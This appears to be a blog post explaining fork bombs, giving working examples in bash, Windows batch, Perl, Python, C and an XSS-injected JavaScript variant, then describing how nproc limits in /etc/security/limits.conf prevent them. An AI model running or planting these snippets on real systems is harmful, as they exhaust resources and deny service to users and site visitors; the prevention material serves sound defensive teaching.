Bomb that can destroy your Linux Box

In computing, a fork bomb (also called rabbit virus or wabbit ) is a denial-of-service attack whereby a process continually replicates itself to deplete available system resources.
Best Terminal alternatives for Linux systems
Best Terminal alternatives for Linux systems
Fork bombs operate both by consuming CPU time in the process of forking, and by saturating the operating system's process table. A basic implementation of a fork bomb is an infinite loop that repeatedly launches the same process.

In Unix-like operating systems, fork bombs are generally written to use the fork system call. As forked processes are also copies of the first program, once they resume execution from the next address at the frame pointer, they also seek to create a copy of themselves; this has the effect of causing an exponential growth in processes. As modern Unix systems generally use copy-on-write when forking new processes, a fork bomb generally will not saturate such a system's memory.

Examples of fork bomb:

1.       The bomb is executed by pasting the following 13 characters into a UNIX shell such as bash or zsh. It operates by defining a function called ':', which calls itself twice, once in the foreground and once in the background.

 :(){ :|:& };:

A fork bomb using the Microsoft Windows batch language:

:s
start "" %0
goto s

The same as above, but shorter:

 %0|%0

An inline shell example using the Perl interpreter:

 perl -e "fork while fork" &

Using Python:

import os
while True: os.fork( )

Or in C:

#include <unistd.h> 

int main(void)
{
while (1)
fork ( );
}

JavaScript code that can be injected into a Web page via an XSS vulnerability exploit, resulting in a series of infinitely forking pop-up windows:

<script>
while (true) {
var w = window.open ( );
w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}
<script>

Prevention from fork bomb:

The reason some one can start a fork bomb and make it a success is that you have not limited user processes.
You can limit how many process a user or group can start on your linux box by editing /etc/security/limits.conf file.
 Making correct changes to the limit.conf would make sure that any user can not spawn any number of process he/she wishes.

Understanding /etc/security/limits.conf :

Each line describes a limit for a user in the form:
<domain>        <type>  <item>  <value>

Where: <domain> can be:


- an user name
- a group name, with @group syntax
- the wildcard *, for default entry
- the wildcard %, can be also used with %group syntax, for maxlogin limit
<type> can have the two values:

-"soft" for enforcing the soft limits
-"hard" for enforcing hard limits

<item> can be one of the following:

- core - limits the core file size (KB)
- data - max data size (KB)
- fsize - maximum filesize (KB)
- memlock - max locked-in-memory address space (KB)
- nofile - max number of open files
- rss - max resident set size (KB)
- stack - max stack size (KB)
- cpu - max CPU time (MIN)
- nproc - max number of processes
- as - address space limit (KB)
- maxlogins - max number of logins for this user
- maxsyslogins - max number of logins on the system
- priority - the priority to run user process with
- locks - max number of file locks the user can hold
- sigpending - max number of pending signals
- msgqueue - max memory used by POSIX message queues (bytes)
- nice - max nice priority allowed to raise to values: [-20, 19]
- rtprio - max realtime priority

You can edit the file as a root user.

vi /etc/security/limits.conf

guest hard nproc 200
@admins soft nproc 100
@admins hard nproc 200

Difference between soft and hard limits

The soft limit will not stop you from adding new process however you will be greeted with a warning.
The hard limit is the actual limit after which you can’t add more processes.

Now, save the file and test the new configuration by dropping a fork bomb.

Happy Bombing ;)

Related Post: Best Terminal alternatives for Linux systems
Best Terminal alternatives for Linux systems
Best Terminal alternatives for Linux systems
Best Terminal alternatives for Linux systems
Best Terminal alternatives for Linux systems
Best Terminal alternatives for Linux systems
Best Terminal alternatives for Linux systems

Related

open source 8473923184944643627

Post a Comment

  1. With great power comes great responsibility!

    ReplyDelete

emo-but-icon

Translate

 

Hot

comments

Recent Comments Widget

Join Us

 

Sponsored By

Recommended for you

get social

item